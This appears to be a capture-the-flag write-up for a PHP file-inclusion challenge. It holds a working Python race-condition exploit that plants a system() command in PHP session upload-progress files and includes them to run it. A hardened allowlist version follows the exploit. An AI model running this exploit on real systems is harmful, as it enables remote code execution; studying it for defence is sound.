- Code audit
```php
<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    if(file_exists($file)){
        $content = file_get_contents($file);
        if(strpos($content, "<")>0){
            die("error");
        }
        include($file);
    }
}else{
    highlight_file(__FILE__);
}
```
2. Same principle as `web82`, but here the server checks whether the generated `/tmp/sess_xxxx` file contains `<` and stops if it does, so the original race script rarely succeeds. We tweak it: put the command directly in the payload instead of writing a webshell.
```python
# -*- coding: utf-8 -*-
'''
@Time : 2021/7/8 16:49
@Author : Seals6
@File : web85.py
@contact: 972480239@qq.com
@blog: seals6.github.io
-*- Function description -*-
-*- Update notes -*-
'''
import io
import requests
import threading

url = 'http://771fcdbe-7f88-48f1-ba7d-c2df30183f61.challenge.ctf.show:8080/'


def write(session):
    # Upload continuously with PHP_SESSION_UPLOAD_PROGRESS set, so the server
    # keeps recreating /tmp/sess_flag with the payload; 'seals6' is the marker
    # the reader threads look for.
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac f*");?>seals6'
    }
    while True:
        f = io.BytesIO(b'a' * 1024 * 10)
        session.post(url, cookies={'PHPSESSID': 'flag'}, data=data,
                     files={'file': ('dota.txt', f)})


def read(session):
    # Race the include: keep requesting the session file until the marker
    # appears in the response, then print the output.
    while True:
        response = session.get(url + '?file=/tmp/sess_flag')
        if 'seals6' in response.text:
            print(response.text)
            break
        else:
            print('retry')


if __name__ == '__main__':
    session = requests.session()
    for i in range(30):
        threading.Thread(target=write, args=(session,)).start()
    for i in range(30):
        threading.Thread(target=read, args=(session,)).start()
```
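As an added defensive counterpart (not part of the original write-up or the challenge code): the `str_replace` blacklist in the audited snippet is replaced by an allowlist of page names plus a resolved-path check, so user input never forms a path of its own; `INCLUDE_DIR` and `ALLOWED_PAGES` are assumed values, and the php.ini directives in the comment are real PHP settings that turn off the session upload-progress writes the race depends on.

```php
<?php
// Hardened version of the audited include (added example, not the challenge code).
// php.ini hardening relevant to this challenge (real directives):
//   session.upload_progress.enabled = Off   ; no upload-progress data written to session files
//   session.upload_progress.cleanup = On    ; (default) drop progress data when the upload ends
declare(strict_types=1);

const INCLUDE_DIR = __DIR__ . '/pages';              // assumed: directory holding includable pages
const ALLOWED_PAGES = ['home', 'about', 'contact'];  // assumed: the only names that may be included

function safe_include(string $page): void
{
    // 1. Exact allowlist match only: no wrappers, dots, slashes or session paths can get through,
    //    and there is nothing for a keyword blacklist to miss.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        http_response_code(404);
        exit('not found');
    }
    // 2. Build the path server-side and confirm the resolved file still lives inside INCLUDE_DIR.
    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . $page . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        exit('not found');
    }
    include $path;
}

if (isset($_GET['file'])) {
    safe_include((string) $_GET['file']);
} else {
    highlight_file(__FILE__);
}
```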